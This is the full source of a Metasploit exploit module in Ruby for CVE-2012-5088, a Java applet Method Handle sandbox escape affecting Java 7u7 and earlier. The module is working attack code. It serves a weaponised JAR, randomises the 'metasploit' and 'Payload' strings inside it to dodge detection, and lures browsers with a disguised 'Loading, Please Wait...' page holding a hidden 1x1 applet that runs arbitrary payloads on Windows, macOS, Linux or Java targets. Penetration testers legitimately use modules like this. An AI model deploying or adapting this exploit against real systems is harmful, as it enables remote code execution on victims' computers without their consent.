Path: blob/master/modules/exploits/multi/browser/java_jre17_method_handle.rb
19850 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::EXE1011# include Msf::Exploit::Remote::BrowserAutopwn12# autopwn_info({ :javascript => false })1314def initialize(info = {})15super(16update_info(17info,18'Name' => 'Java Applet Method Handle Remote Code Execution',19'Description' => %q{20This module abuses the Method Handle class from a Java Applet to run arbitrary21Java code outside of the sandbox. The vulnerability affects Java version 7u7 and22earlier.23},24'License' => MSF_LICENSE,25'Author' => [26'Unknown', # Vulnerability discovery at security-explorations.com27'juan vazquez' # Metasploit module28],29'References' => [30[ 'CVE', '2012-5088' ],31[ 'OSVDB', '86352' ],32[ 'BID', '56057' ],33[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],34[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]35],36'Platform' => %w{java linux osx win},37'Payload' => { 'Space' => 20480, 'DisableNops' => true },38'Targets' => [39[40'Generic (Java Payload)',41{42'Platform' => ['java'],43'Arch' => ARCH_JAVA,44}45],46[47'Windows x86 (Native Payload)',48{49'Platform' => 'win',50'Arch' => ARCH_X86,51}52],53[54'Mac OS X x86 (Native Payload)',55{56'Platform' => 'osx',57'Arch' => ARCH_X86,58}59],60[61'Linux x86 (Native Payload)',62{63'Platform' => 'linux',64'Arch' => ARCH_X86,65}66],67],68'DefaultTarget' => 0,69'DisclosureDate' => '2012-10-16',70'Notes' => {71'Reliability' => UNKNOWN_RELIABILITY,72'Stability' => UNKNOWN_STABILITY,73'SideEffects' => UNKNOWN_SIDE_EFFECTS74}75)76)77end7879def setup80path = File.join(Msf::Config.data_directory, "exploits", "cve-2012-5088", "Exploit.class")81@exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }82path = File.join(Msf::Config.data_directory, "exploits", "cve-2012-5088", "B.class")83@loader_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }8485@exploit_class_name = rand_text_alpha("Exploit".length)86@exploit_class.gsub!("Exploit", @exploit_class_name)87super88end8990def on_request_uri(cli, request)91print_status("handling request for #{request.uri}")9293case request.uri94when /\.jar$/i95jar = payload.encoded_jar96jar.add_file("#{@exploit_class_name}.class", @exploit_class)97jar.add_file("B.class", @loader_class)98metasploit_str = rand_text_alpha("metasploit".length)99payload_str = rand_text_alpha("payload".length)100jar.entries.each { |entry|101entry.name.gsub!("metasploit", metasploit_str)102entry.name.gsub!("Payload", payload_str)103entry.data = entry.data.gsub("metasploit", metasploit_str)104entry.data = entry.data.gsub("Payload", payload_str)105}106jar.build_manifest107108send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })109when /\/$/110payload = regenerate_payload(cli)111if not payload112print_error("Failed to generate the payload.")113send_not_found(cli)114return115end116send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })117else118send_redirect(cli, get_resource() + '/', '')119end120end121122def generate_html123html = %Q|<html><head><title>Loading, Please Wait...</title></head>|124html += %Q|<body><center><p>Loading, Please Wait...</p></center>|125html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|126html += %Q|</applet></body></html>|127return html128end129end130131132